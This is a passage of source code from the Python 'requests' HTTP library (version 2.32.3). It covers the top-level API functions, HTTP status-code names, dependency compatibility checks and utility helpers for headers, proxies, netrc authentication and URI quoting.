RequestsJSONDecodeError(e.msg, e.doc, e.pos) try: return complexjson.loads(self.text, **kwargs) except JSONDecodeError as e: # Catch JSON-related errors and raise as requests.JSONDecodeError # This aliases json.JSONDecodeError and simplejson.JSONDecodeError raise RequestsJSONDecodeError(e.msg, e.doc, e.pos) @property def links(self): """Returns the parsed header links of the response, if any.""" header = self.headers.get("link") resolved_links = {} if header: links = parse_header_links(header) for link in links: key = link.get("rel") or link.get("url") resolved_links[key] = link return resolved_links def raise_for_status(self): """Raises :class:`HTTPError`, if one occurred.""" http_error_msg = "" if isinstance(self.reason, bytes): # We attempt to decode utf-8 first because some servers # choose to localize their reason strings. If the string # isn't utf-8, we fall back to iso-8859-1 for all other # encodings. (See PR #3538) try: reason = self.reason.decode("utf-8") except UnicodeDecodeError: reason = self.reason.decode("iso-8859-1") else: reason = self.reason if 400 <= self.status_code < 500: http_error_msg = ( f"{self.status_code} Client Error: {reason} for url: {self.url}" ) elif 500 <= self.status_code < 600: http_error_msg = ( f"{self.status_code} Server Error: {reason} for url: {self.url}" ) if http_error_msg: raise HTTPError(http_error_msg, response=self) def close(self): """Releases the connection back to the pool. Once this method has been called the underlying ``raw`` object must not be accessed again. *Note: Should not normally need to be called explicitly.* """ if not self._content_consumed: self.raw.close() release_conn = getattr(self.raw, "release_conn", None) if release_conn is not None: release_conn() File: src/requests/certs.py #!/usr/bin/env python """ requests.certs ~~~~~~~~~~~~~~ This module returns the preferred default CA certificate bundle. There is only one — the one from the certifi package. If you are packaging Requests, e.g., for a Linux distribution or a managed environment, you can change the definition of where() to return a separately packaged CA bundle. """ from certifi import where if __name__ == "__main__": print(where()) File: src/requests/__init__.py # __ # /__) _ _ _ _ _/ _ # / ( (- (/ (/ (- _) / _) # / """ Requests HTTP Library ~~~~~~~~~~~~~~~~~~~~~ Requests is an HTTP library, written in Python, for human beings. Basic GET usage: >>> import requests >>> r = requests.get('https://www.python.org') >>> r.status_code 200 >>> b'Python is a programming language' in r.content True ... or POST: >>> payload = dict(key1='value1', key2='value2') >>> r = requests.post('https://httpbin.org/post', data=payload) >>> print(r.text) { ... "form": { "key1": "value1", "key2": "value2" }, ... } The other HTTP methods are supported - see `requests.api`. Full documentation is at <https://requests.readthedocs.io>. :copyright: (c) 2017 by Kenneth Reitz. :license: Apache 2.0, see LICENSE for more details. """ import warnings import urllib3 from .exceptions import RequestsDependencyWarning try: from charset_normalizer import __version__ as charset_normalizer_version except ImportError: charset_normalizer_version = None try: from chardet import __version__ as chardet_version except ImportError: chardet_version = None def check_compatibility(urllib3_version, chardet_version, charset_normalizer_version): urllib3_version = urllib3_version.split(".") assert urllib3_version != ["dev"] # Verify urllib3 isn't installed from git. # Sometimes, urllib3 only reports its version as 16.1. if len(urllib3_version) == 2: urllib3_version.append("0") # Check urllib3 for compatibility. major, minor, patch = urllib3_version # noqa: F811 major, minor, patch = int(major), int(minor), int(patch) # urllib3 >= 1.21.1 assert major >= 1 if major == 1: assert minor >= 21 # Check charset_normalizer for compatibility. if chardet_version: major, minor, patch = chardet_version.split(".")[:3] major, minor, patch = int(major), int(minor), int(patch) # chardet_version >= 3.0.2, < 6.0.0 assert (3, 0, 2) <= (major, minor, patch) < (6, 0, 0) elif charset_normalizer_version: major, minor, patch = charset_normalizer_version.split(".")[:3] major, minor, patch = int(major), int(minor), int(patch) # charset_normalizer >= 2.0.0 < 4.0.0 assert (2, 0, 0) <= (major, minor, patch) < (4, 0, 0) else: warnings.warn( "Unable to find acceptable character detection dependency " "(chardet or charset_normalizer).", RequestsDependencyWarning, ) def _check_cryptography(cryptography_version): # cryptography < 1.3.4 try: cryptography_version = list(map(int, cryptography_version.split("."))) except ValueError: return if cryptography_version < [1, 3, 4]: warning = "Old version of cryptography ({}) may cause slowdown.".format( cryptography_version ) warnings.warn(warning, RequestsDependencyWarning) # Check imported dependencies for compatibility. try: check_compatibility( urllib3.__version__, chardet_version, charset_normalizer_version ) except (AssertionError, ValueError): warnings.warn( "urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported " "version!".format( urllib3.__version__, chardet_version, charset_normalizer_version ), RequestsDependencyWarning, ) # Attempt to enable urllib3's fallback for SNI support # if the standard library doesn't support SNI or the # 'ssl' library isn't available. try: try: import ssl except ImportError: ssl = None if not getattr(ssl, "HAS_SNI", False): from urllib3.contrib import pyopenssl pyopenssl.inject_into_urllib3() # Check cryptography version from cryptography import __version__ as cryptography_version _check_cryptography(cryptography_version) except ImportError: pass # urllib3's DependencyWarnings should be silenced. from urllib3.exceptions import DependencyWarning warnings.simplefilter("ignore", DependencyWarning) # Set default logging handler to avoid "No handler found" warnings. import logging from logging import NullHandler from . import packages, utils from .__version__ import ( __author__, __author_email__, __build__, __cake__, __copyright__, __description__, __license__, __title__, __url__, __version__, ) from .api import delete, get, head, options, patch, post, put, request from .exceptions import ( ConnectionError, ConnectTimeout, FileModeWarning, HTTPError, JSONDecodeError, ReadTimeout, RequestException, Timeout, TooManyRedirects, URLRequired, ) from .models import PreparedRequest, Request, Response from .sessions import Session, session from .status_codes import codes logging.getLogger(__name__).addHandler(NullHandler()) # FileModeWarnings go off per the default. warnings.simplefilter("default", FileModeWarning, append=True) File: src/requests/status_codes.py r""" The ``codes`` object defines a mapping from common names for HTTP statuses to their numerical codes, accessible either as attributes or as dictionary items. Example:: >>> import requests >>> requests.codes['temporary_redirect'] 307 >>> requests.codes.teapot 418 >>> requests.codes['\o/'] 200 Some codes have multiple names, and both upper- and lower-case versions of the names are allowed. For example, ``codes.ok``, ``codes.OK``, and ``codes.okay`` all correspond to the HTTP status code 200. """ from .structures import LookupDict _codes = { # Informational. 100: ("continue",), 101: ("switching_protocols",), 102: ("processing", "early-hints"), 103: ("checkpoint",), 122: ("uri_too_long", "request_uri_too_long"), 200: ("ok", "okay", "all_ok", "all_okay", "all_good", "\\o/", "✓"), 201: ("created",), 202: ("accepted",), 203: ("non_authoritative_info", "non_authoritative_information"), 204: ("no_content",), 205: ("reset_content", "reset"), 206: ("partial_content", "partial"), 207: ("multi_status", "multiple_status", "multi_stati", "multiple_stati"), 208: ("already_reported",), 226: ("im_used",), # Redirection. 300: ("multiple_choices",), 301: ("moved_permanently", "moved", "\\o-"), 302: ("found",), 303: ("see_other", "other"), 304: ("not_modified",), 305: ("use_proxy",), 306: ("switch_proxy",), 307: ("temporary_redirect", "temporary_moved", "temporary"), 308: ( "permanent_redirect", "resume_incomplete", "resume", ), # "resume" and "resume_incomplete" to be removed in 3.0 # Client Error. 400: ("bad_request", "bad"), 401: ("unauthorized",), 402: ("payment_required", "payment"), 403: ("forbidden",), 404: ("not_found", "-o-"), 405: ("method_not_allowed", "not_allowed"), 406: ("not_acceptable",), 407: ("proxy_authentication_required", "proxy_auth", "proxy_authentication"), 408: ("request_timeout", "timeout"), 409: ("conflict",), 410: ("gone",), 411: ("length_required",), 412: ("precondition_failed", "precondition"), 413: ("request_entity_too_large", "content_too_large"), 414: ("request_uri_too_large", "uri_too_long"), 415: ("unsupported_media_type", "unsupported_media", "media_type"), 416: ( "requested_range_not_satisfiable", "requested_range", "range_not_satisfiable", ), 417: ("expectation_failed",), 418: ("im_a_teapot", "teapot", "i_am_a_teapot"), 421: ("misdirected_request",), 422: ("unprocessable_entity", "unprocessable", "unprocessable_content"), 423: ("locked",), 424: ("failed_dependency", "dependency"), 425: ("unordered_collection", "unordered", "too_early"), 426: ("upgrade_required", "upgrade"), 428: ("precondition_required", "precondition"), 429: ("too_many_requests", "too_many"), 431: ("header_fields_too_large", "fields_too_large"), 444: ("no_response", "none"), 449: ("retry_with", "retry"), 450: ("blocked_by_windows_parental_controls", "parental_controls"), 451: ("unavailable_for_legal_reasons", "legal_reasons"), 499: ("client_closed_request",), # Server Error. 500: ("internal_server_error", "server_error", "/o\\", "✗"), 501: ("not_implemented",), 502: ("bad_gateway",), 503: ("service_unavailable", "unavailable"), 504: ("gateway_timeout",), 505: ("http_version_not_supported", "http_version"), 506: ("variant_also_negotiates",), 507: ("insufficient_storage",), 509: ("bandwidth_limit_exceeded", "bandwidth"), 510: ("not_extended",), 511: ("network_authentication_required", "network_auth", "network_authentication"), } codes = LookupDict(name="status_codes") def _init(): for code, titles in _codes.items(): for title in titles: setattr(codes, title, code) if not title.startswith(("\\", "/")): setattr(codes, title.upper(), code) def doc(code): names = ", ".join(f"``{n}``" for n in _codes[code]) return "* %d: %s" % (code, names) global __doc__ __doc__ = ( __doc__ + "\n" + "\n".join(doc(code) for code in sorted(_codes)) if __doc__ is not None else None ) _init() File: src/requests/packages.py import sys from .compat import chardet # This code exists for backwards compatibility reasons. # I don't like it either. Just look the other way. :) for package in ("urllib3", "idna"): locals()[package] = __import__(package) # This traversal is apparently necessary such that the identities are # preserved (requests.packages.urllib3.* is urllib3.*) for mod in list(sys.modules): if mod == package or mod.startswith(f"{package}."): sys.modules[f"requests.packages.{mod}"] = sys.modules[mod] if chardet is not None: target = chardet.__name__ for mod in list(sys.modules): if mod == target or mod.startswith(f"{target}."): imported_mod = sys.modules[mod] sys.modules[f"requests.packages.{mod}"] = imported_mod mod = mod.replace(target, "chardet") sys.modules[f"requests.packages.{mod}"] = imported_mod File: src/requests/__version__.py # .-. .-. .-. . . .-. .-. .-. .-. # |( |- |.| | | |- `-. | `-. # ' ' `-' `-`.`-' `-' `-' ' `-' __title__ = "requests" __description__ = "Python HTTP for Humans." __url__ = "https://requests.readthedocs.io" __version__ = "2.32.3" __build__ = 0x023203 __author__ = "Kenneth Reitz" __author_email__ = "[email protected]" __license__ = "Apache-2.0" __copyright__ = "Copyright Kenneth Reitz" __cake__ = "\u2728 \U0001f370 \u2728" File: src/requests/api.py """ requests.api ~~~~~~~~~~~~ This module implements the Requests API. :copyright: (c) 2012 by Kenneth Reitz. :license: Apache2, see LICENSE for more details. """ from . import sessions def request(method, url, **kwargs): """Constructs and sends a :class:`Request <Request>`. :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary, list of tuples or bytes to send in the query string for the :class:`Request`. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. :param files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': file-tuple}``) for multipart encoding upload. ``file-tuple`` can be a 2-tuple ``('filename', fileobj)``, 3-tuple ``('filename', fileobj, 'content_type')`` or a 4-tuple ``('filename', fileobj, 'content_type', custom_headers)``, where ``'content_type'`` is a string defining the content type of the given file and ``custom_headers`` a dict-like object containing additional headers to add for the file. :param auth: (optional) Auth tuple to enable Basic/Digest/Custom HTTP Auth. :param timeout: (optional) How many seconds to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. :type timeout: float or tuple :param allow_redirects: (optional) Boolean. Enable/disable GET/OPTIONS/POST/PUT/PATCH/DELETE/HEAD redirection. Defaults to ``True``. :type allow_redirects: bool :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy. :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. Defaults to ``True``. :param stream: (optional) if ``False``, the response content will be immediately downloaded. :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. :return: :class:`Response <Response>` object :rtype: requests.Response Usage:: >>> import requests >>> req = requests.request('GET', 'https://httpbin.org/get') >>> req <Response [200]> """ # By using the 'with' statement we are sure the session is closed, thus we # avoid leaving sockets open which can trigger a ResourceWarning in some # cases, and look like a memory leak in others. with sessions.Session() as session: return session.request(method=method, url=url, **kwargs) def get(url, params=None, **kwargs): r"""Sends a GET request. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary, list of tuples or bytes to send in the query string for the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("get", url, params=params, **kwargs) def options(url, **kwargs): r"""Sends an OPTIONS request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("options", url, **kwargs) def head(url, **kwargs): r"""Sends a HEAD request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. If `allow_redirects` is not provided, it will be set to `False` (as opposed to the default :meth:`request` behavior). :return: :class:`Response <Response>` object :rtype: requests.Response """ kwargs.setdefault("allow_redirects", False) return request("head", url, **kwargs) def post(url, data=None, json=None, **kwargs): r"""Sends a POST request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("post", url, data=data, json=json, **kwargs) def put(url, data=None, **kwargs): r"""Sends a PUT request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("put", url, data=data, **kwargs) def patch(url, data=None, **kwargs): r"""Sends a PATCH request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("patch", url, data=data, **kwargs) def delete(url, **kwargs): r"""Sends a DELETE request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("delete", url, **kwargs) File: src/requests/_internal_utils.py """ requests._internal_utils ~~~~~~~~~~~~~~ Provides utility functions that are consumed internally by Requests which depend on extremely few external helpers (such as compat) """ import re from .compat import builtin_str _VALID_HEADER_NAME_RE_BYTE = re.compile(rb"^[^:\s][^:\r\n]*$") _VALID_HEADER_NAME_RE_STR = re.compile(r"^[^:\s][^:\r\n]*$") _VALID_HEADER_VALUE_RE_BYTE = re.compile(rb"^\S[^\r\n]*$|^$") _VALID_HEADER_VALUE_RE_STR = re.compile(r"^\S[^\r\n]*$|^$") _HEADER_VALIDATORS_STR = (_VALID_HEADER_NAME_RE_STR, _VALID_HEADER_VALUE_RE_STR) _HEADER_VALIDATORS_BYTE = (_VALID_HEADER_NAME_RE_BYTE, _VALID_HEADER_VALUE_RE_BYTE) HEADER_VALIDATORS = { bytes: _HEADER_VALIDATORS_BYTE, str: _HEADER_VALIDATORS_STR, } def to_native_string(string, encoding="ascii"): """Given a string object, regardless of type, returns a representation of that string in the native string type, encoding and decoding where necessary. This assumes ASCII unless told otherwise. """ if isinstance(string, builtin_str): out = string else: out = string.decode(encoding) return out def unicode_is_ascii(u_string): """Determine if unicode string only contains ASCII characters. :param str u_string: unicode string to check. Must be unicode and not Python 2 `str`. :rtype: bool """ assert isinstance(u_string, str) try: u_string.encode("ascii") return True except UnicodeEncodeError: return False File: src/requests/utils.py """ requests.utils ~~~~~~~~~~~~~~ This module provides utility functions that are used within Requests that are also useful for external consumption. """ import codecs import contextlib import io import os import re import socket import struct import sys import tempfile import warnings import zipfile from collections import OrderedDict from urllib3.util import make_headers, parse_url from . import certs from .__version__ import __version__ # to_native_string is unused here, but imported here for backwards compatibility from ._internal_utils import ( # noqa: F401 _HEADER_VALIDATORS_BYTE, _HEADER_VALIDATORS_STR, HEADER_VALIDATORS, to_native_string, ) from .compat import ( Mapping, basestring, bytes, getproxies, getproxies_environment, integer_types, is_urllib3_1, ) from .compat import parse_http_list as _parse_list_header from .compat import ( proxy_bypass, proxy_bypass_environment, quote, str, unquote, urlparse, urlunparse, ) from .cookies import cookiejar_from_dict from .exceptions import ( FileModeWarning, InvalidHeader, InvalidURL, UnrewindableBodyError, ) from .structures import CaseInsensitiveDict NETRC_FILES = (".netrc", "_netrc") DEFAULT_CA_BUNDLE_PATH = certs.where() DEFAULT_PORTS = {"http": 80, "https": 443} # Ensure that ', ' is used to preserve previous delimiter behavior. DEFAULT_ACCEPT_ENCODING = ", ".join( re.split(r",\s*", make_headers(accept_encoding=True)["accept-encoding"]) ) if sys.platform == "win32": # provide a proxy_bypass version on Windows without DNS lookups def proxy_bypass_registry(host): try: import winreg except ImportError: return False try: internetSettings = winreg.OpenKey( winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Internet Settings", ) # ProxyEnable could be REG_SZ or REG_DWORD, normalizing it proxyEnable = int(winreg.QueryValueEx(internetSettings, "ProxyEnable")[0]) # ProxyOverride is almost always a string proxyOverride = winreg.QueryValueEx(internetSettings, "ProxyOverride")[0] except (OSError, ValueError): return False if not proxyEnable or not proxyOverride: return False # make a check value list from the registry entry: replace the # '<local>' string by the localhost entry and the corresponding # canonical entry. proxyOverride = proxyOverride.split(";") # filter out empty strings to avoid re.match return true in the following code. proxyOverride = filter(None, proxyOverride) # now check if we match one of the registry values. for test in proxyOverride: if test == "<local>": if "." not in host: return True test = test.replace(".", r"\.") # mask dots test = test.replace("*", r".*") # change glob sequence test = test.replace("?", r".") # change glob char if re.match(test, host, re.I): return True return False def proxy_bypass(host): # noqa """Return True, if the host should be bypassed. Checks proxy settings gathered from the environment, if specified, or the registry. """ if getproxies_environment(): return proxy_bypass_environment(host) else: return proxy_bypass_registry(host) def dict_to_sequence(d): """Returns an internal sequence dictionary update.""" if hasattr(d, "items"): d = d.items() return d def super_len(o): total_length = None current_position = 0 if not is_urllib3_1 and isinstance(o, str): # urllib3 2.x+ treats all strings as utf-8 instead # of latin-1 (iso-8859-1) like http.client. o = o.encode("utf-8") if hasattr(o, "__len__"): total_length = len(o) elif hasattr(o, "len"): total_length = o.len elif hasattr(o, "fileno"): try: fileno = o.fileno() except (io.UnsupportedOperation, AttributeError): # AttributeError is a surprising exception, seeing as how we've just checked # that `hasattr(o, 'fileno')`. It happens for objects obtained via # `Tarfile.extractfile()`, per issue 5229. pass else: total_length = os.fstat(fileno).st_size # Having used fstat to determine the file length, we need to # confirm that this file was opened up in binary mode. if "b" not in o.mode: warnings.warn( ( "Requests has determined the content-length for this " "request using the binary size of the file: however, the " "file has been opened in text mode (i.e. without the 'b' " "flag in the mode). This may lead to an incorrect " "content-length. In Requests 3.0, support will be removed " "for files in text mode." ), FileModeWarning, ) if hasattr(o, "tell"): try: current_position = o.tell() except OSError: # This can happen in some weird situations, such as when the file # is actually a special file descriptor like stdin. In this # instance, we don't know what the length is, so set it to zero and # let requests chunk it instead. if total_length is not None: current_position = total_length else: if hasattr(o, "seek") and total_length is None: # StringIO and BytesIO have seek but no usable fileno try: # seek to end of file o.seek(0, 2) total_length = o.tell() # seek back to current position to support # partially read file-like objects o.seek(current_position or 0) except OSError: total_length = 0 if total_length is None: total_length = 0 return max(0, total_length - current_position) def get_netrc_auth(url, raise_errors=False): """Returns the Requests tuple auth for a given url from netrc.""" netrc_file = os.environ.get("NETRC") if netrc_file is not None: netrc_locations = (netrc_file,) else: netrc_locations = (f"~/{f}" for f in NETRC_FILES) try: from netrc import NetrcParseError, netrc netrc_path = None for f in netrc_locations: try: loc = os.path.expanduser(f) except KeyError: # os.path.expanduser can fail when $HOME is undefined and # getpwuid fails. See https://bugs.python.org/issue20164 & # https://github.com/psf/requests/issues/1846 return if os.path.exists(loc): netrc_path = loc break # Abort early if there isn't one. if netrc_path is None: return ri = urlparse(url) # Strip port numbers from netloc. This weird `if...encode`` dance is # used for Python 3.2, which doesn't support unicode literals. splitstr = b":" if isinstance(url, str): splitstr = splitstr.decode("ascii") host = ri.netloc.split(splitstr)[0] try: _netrc = netrc(netrc_path).authenticators(host) if _netrc: # Return with login / password login_i = 0 if _netrc[0] else 1 return (_netrc[login_i], _netrc[2]) except (NetrcParseError, OSError): # If there was a parsing error or a permissions issue reading the file, # we'll just skip netrc auth unless explicitly asked to raise errors. if raise_errors: raise # App Engine hackiness. except (ImportError, AttributeError): pass def guess_filename(obj): """Tries to guess the filename of the given object.""" name = getattr(obj, "name", None) if name and isinstance(name, basestring) and name[0] != "<" and name[-1] != ">": return os.path.basename(name) def extract_zipped_paths(path): """Replace nonexistent paths that look like they refer to a member of a zip archive with the location of an extracted copy of the target, or else just return the provided path unchanged. """ if os.path.exists(path): # this is already a valid path, no need to do anything further return path # find the first valid part of the provided path and treat that as a zip archive # assume the rest of the path is the name of a member in the archive archive, member = os.path.split(path) while archive and not os.path.exists(archive): archive, prefix = os.path.split(archive) if not prefix: # If we don't check for an empty prefix after the split (in other words, archive remains unchanged after the split), # we _can_ end up in an infinite loop on a rare corner case affecting a small number of users break member = "/".join([prefix, member]) if not zipfile.is_zipfile(archive): return path zip_file = zipfile.ZipFile(archive) if member not in zip_file.namelist(): return path # we have a valid zip archive and a valid member of that archive tmp = tempfile.gettempdir() extracted_path = os.path.join(tmp, member.split("/")[-1]) if not os.path.exists(extracted_path): # use read + write to avoid the creating nested folders, we only want the file, avoids mkdir racing condition with atomic_open(extracted_path) as file_handler: file_handler.write(zip_file.read(member)) return extracted_path @contextlib.contextmanager def atomic_open(filename): """Write a file to the disk in an atomic fashion""" tmp_descriptor, tmp_name = tempfile.mkstemp(dir=os.path.dirname(filename)) try: with os.fdopen(tmp_descriptor, "wb") as tmp_handler: yield tmp_handler os.replace(tmp_name, filename) except BaseException: os.remove(tmp_name) raise def from_key_val_list(value): """Take an object and test to see if it can be represented as a dictionary. Unless it can not be represented as such, return an OrderedDict, e.g., :: >>> from_key_val_list([('key', 'val')]) OrderedDict([('key', 'val')]) >>> from_key_val_list('string') Traceback (most recent call last): ... ValueError: cannot encode objects that are not 2-tuples >>> from_key_val_list({'key': 'val'}) OrderedDict([('key', 'val')]) :rtype: OrderedDict """ if value is None: return None if isinstance(value, (str, bytes, bool, int)): raise ValueError("cannot encode objects that are not 2-tuples") return OrderedDict(value) def to_key_val_list(value): """Take an object and test to see if it can be represented as a dictionary. If it can be, return a list of tuples, e.g., :: >>> to_key_val_list([('key', 'val')]) [('key', 'val')] >>> to_key_val_list({'key': 'val'}) [('key', 'val')] >>> to_key_val_list('string') Traceback (most recent call last): ... ValueError: cannot encode objects that are not 2-tuples :rtype: list """ if value is None: return None if isinstance(value, (str, bytes, bool, int)): raise ValueError("cannot encode objects that are not 2-tuples") if isinstance(value, Mapping): value = value.items() return list(value) # From mitsuhiko/werkzeug (used with permission). def parse_list_header(value): """Parse lists as described by RFC 2068 Section 2. In particular, parse comma-separated lists where the elements of the list may include quoted-strings. A quoted-string could contain a comma. A non-quoted string could have quotes in the middle. Quotes are removed automatically after parsing. It basically works like :func:`parse_set_header` just that items may appear multiple times and case sensitivity is preserved. The return value is a standard :class:`list`: >>> parse_list_header('token, "quoted value"') ['token', 'quoted value'] To create a header from the :class:`list` again, use the :func:`dump_header` function. :param value: a string with a list header. :return: :class:`list` :rtype: list """ result = [] for item in _parse_list_header(value): if item[:1] == item[-1:] == '"': item = unquote_header_value(item[1:-1]) result.append(item) return result # From mitsuhiko/werkzeug (used with permission). def parse_dict_header(value): """Parse lists of key, value pairs as described by RFC 2068 Section 2 and convert them into a python dict: >>> d = parse_dict_header('foo="is a fish", bar="as well"') >>> type(d) is dict True >>> sorted(d.items()) [('bar', 'as well'), ('foo', 'is a fish')] If there is no value for a key it will be `None`: >>> parse_dict_header('key_without_value') {'key_without_value': None} To create a header from the :class:`dict` again, use the :func:`dump_header` function. :param value: a string with a dict header. :return: :class:`dict` :rtype: dict """ result = {} for item in _parse_list_header(value): if "=" not in item: result[item] = None continue name, value = item.split("=", 1) if value[:1] == value[-1:] == '"': value = unquote_header_value(value[1:-1]) result[name] = value return result # From mitsuhiko/werkzeug (used with permission). def unquote_header_value(value, is_filename=False): r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote. :rtype: str """ if value and value[0] == value[-1] == '"': # this is not the real unquoting, but fixing this so that the # RFC is met will result in bugs with internet explorer and # probably some other browsers as well. IE for example is # uploading files with "C:\foo\bar.txt" as filename value = value[1:-1] # if this is a filename and the starting characters look like # a UNC path, then just return the value without quotes. Using the # replace sequence below on a UNC path has the effect of turning # the leading double slash into a single slash and then # _fix_ie_filename() doesn't work correctly. See #458. if not is_filename or value[:2] != "\\\\": return value.replace("\\\\", "\\").replace('\\"', '"') return value def dict_from_cookiejar(cj): """Returns a key/value dictionary from a CookieJar. :param cj: CookieJar object to extract cookies from. :rtype: dict """ cookie_dict = {cookie.name: cookie.value for cookie in cj} return cookie_dict def add_dict_to_cookiejar(cj, cookie_dict): """Returns a CookieJar from a key/value dictionary. :param cj: CookieJar to insert cookies into. :param cookie_dict: Dict of key/values to insert into CookieJar. :rtype: CookieJar """ return cookiejar_from_dict(cookie_dict, cj) def get_encodings_from_content(content): """Returns encodings from given content string. :param content: bytestring to extract encodings from. """ warnings.warn( ( "In requests 3.0, get_encodings_from_content will be removed. For " "more information, please see the discussion on issue #2266. (This" " warning should only appear once.)" ), DeprecationWarning, ) charset_re = re.compile(r'<meta.*?charset=["\']*(.+?)["\'>]', flags=re.I) pragma_re = re.compile(r'<meta.*?content=["\']*;?charset=(.+?)["\'>]', flags=re.I) xml_re = re.compile(r'^<\?xml.*?encoding=["\']*(.+?)["\'>]') return ( charset_re.findall(content) + pragma_re.findall(content) + xml_re.findall(content) ) def _parse_content_type_header(header): """Returns content type and parameters from given header :param header: string :return: tuple containing content type and dictionary of parameters """ tokens = header.split(";") content_type, params = tokens[0].strip(), tokens[1:] params_dict = {} items_to_strip = "\"' " for param in params: param = param.strip() if param: key, value = param, True index_of_equals = param.find("=") if index_of_equals != -1: key = param[:index_of_equals].strip(items_to_strip) value = param[index_of_equals + 1 :].strip(items_to_strip) params_dict[key.lower()] = value return content_type, params_dict def get_encoding_from_headers(headers): """Returns encodings from given HTTP Header Dict. :param headers: dictionary to extract encoding from. :rtype: str """ content_type = headers.get("content-type") if not content_type: return None content_type, params = _parse_content_type_header(content_type) if "charset" in params: return params["charset"].strip("'\"") if "text" in content_type: return "ISO-8859-1" if "application/json" in content_type: # Assume UTF-8 based on RFC 4627: https://www.ietf.org/rfc/rfc4627.txt since the charset was unset return "utf-8" def stream_decode_response_unicode(iterator, r): """Stream decodes an iterator.""" if r.encoding is None: yield from iterator return decoder = codecs.getincrementaldecoder(r.encoding)(errors="replace") for chunk in iterator: rv = decoder.decode(chunk) if rv: yield rv rv = decoder.decode(b"", final=True) if rv: yield rv def iter_slices(string, slice_length): """Iterate over slices of a string.""" pos = 0 if slice_length is None or slice_length <= 0: slice_length = len(string) while pos < len(string): yield string[pos : pos + slice_length] pos += slice_length def get_unicode_from_response(r): """Returns the requested content back in unicode. :param r: Response object to get unicode content from. Tried: 1. charset from content-type 2. fall back and replace all unicode characters :rtype: str """ warnings.warn( ( "In requests 3.0, get_unicode_from_response will be removed. For " "more information, please see the discussion on issue #2266. (This" " warning should only appear once.)" ), DeprecationWarning, ) tried_encodings = [] # Try charset from content-type encoding = get_encoding_from_headers(r.headers) if encoding: try: return str(r.content, encoding) except UnicodeError: tried_encodings.append(encoding) # Fall back: try: return str(r.content, encoding, errors="replace") except TypeError: return r.content # The unreserved URI characters (RFC 3986) UNRESERVED_SET = frozenset( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + "0123456789-._~" ) def unquote_unreserved(uri): """Un-escape any percent-escape sequences in a URI that are unreserved characters. This leaves all reserved, illegal and non-ASCII bytes encoded. :rtype: str """ parts = uri.split("%") for i in range(1, len(parts)): h = parts[i][0:2] if len(h) == 2 and h.isalnum(): try: c = chr(int(h, 16)) except ValueError: raise InvalidURL(f"Invalid percent-escape sequence: '{h}'") if c in UNRESERVED_SET: parts[i] = c + parts[i][2:] else: parts[i] = f"%{parts[i]}" else: parts[i] = f"%{parts[i]}" return "".join(parts) def requote_uri(uri): """Re-quote the given URI. This function passes the given URI through an unquote/quote cycle to ensure that it is fully and consistently quoted. :rtype: str """ safe_with_percent = "!#$%&'()*+,/:;=?@[]~" safe_without_percent = "!#$&'()*+,/:;=?@[]~" try: # Unquote only the unreserved characters # Then quote only illegal characters (do not quote reserved, # unreserved, or '%') return quote(unquote_unreserved(uri), safe=safe_with_percent) except InvalidURL: # We couldn't unquote the given URI, so let's try quoting it, but # there may be unquoted '%'s in the URI. We need to make sure they're # properly quoted so they do not cause issues elsewhere. return quote(uri, safe=safe_without_percent) def address_in_network(ip, net): """This function allows you to check if an IP belongs to a network subnet Example: returns True if ip = 192.168.1.1 and net = 192.168.1.0/24 returns False if ip = 192.168.1.1 and net = 192.168.100.0/24 :rtype: bool """ ipaddr = struct.unpack("=L", socket.inet_aton(ip))[0] netaddr, bits = net.split("/") netmask = struct.unpack("=L", socket.inet_aton(dotted_netmask(int(bits))))[0] network = struct.unpack("=L", socket.inet_aton(netaddr))[0] & netmask return (ipaddr & netmask) == (network & netmask) def dotted_netmask(mask): """Converts mask from /xx format to xxx.xxx.xxx.xxx Example: if mask is 24 function returns 255.255.255.0 :rtype: str """ bits = 0xFFFFFFFF ^ (1 << 32 - mask) - 1 return socket.inet_ntoa(struct.pack(">I", bits)) def is_ipv4_address(string_ip): """ :rtype: bool """ try: socket.inet_aton(string_ip) except OSError: return False return True def 